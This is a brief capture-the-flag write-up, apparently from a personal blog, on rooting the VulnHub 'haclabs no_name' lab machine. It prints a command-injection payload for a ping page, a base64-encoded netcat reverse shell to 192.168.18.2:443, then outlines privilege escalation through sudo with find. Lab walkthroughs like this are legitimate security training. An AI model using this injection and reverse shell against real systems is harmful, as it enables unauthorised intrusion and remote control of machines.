Persecure : my learning archive

hacklabs: no_name CTF

https://www.vulnhub.com/entry/haclabs-no_name,429/

Run a nmap scan to find for open ports.

Run a gobuster scan to find for hidden directories.

index.php
admin
superadmin.php
A real ping page
Able to pipe commands
Unable to pipe the above mentioned commands.

Since we are unable to send nc commands , let’s encode it in base64.

Let’s send the encoded nc payload.

ping 127.0.0.1 | echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTguMiA0NDM=" | base64 -d

Start a nc listener and a shell will be gained once the query is sent.

In the home directory of the yash user we found the first flag which contains a clue.

In the haclabs directory there is the second flag.

Use the find command to find for hidden files.

Password found.

Upgrade the python shell and switch user to haclabs.

Able to run sudo with find command.

Head to GTFO bins to find for an exploit.

Root gained.

Create a website or blog at WordPress.com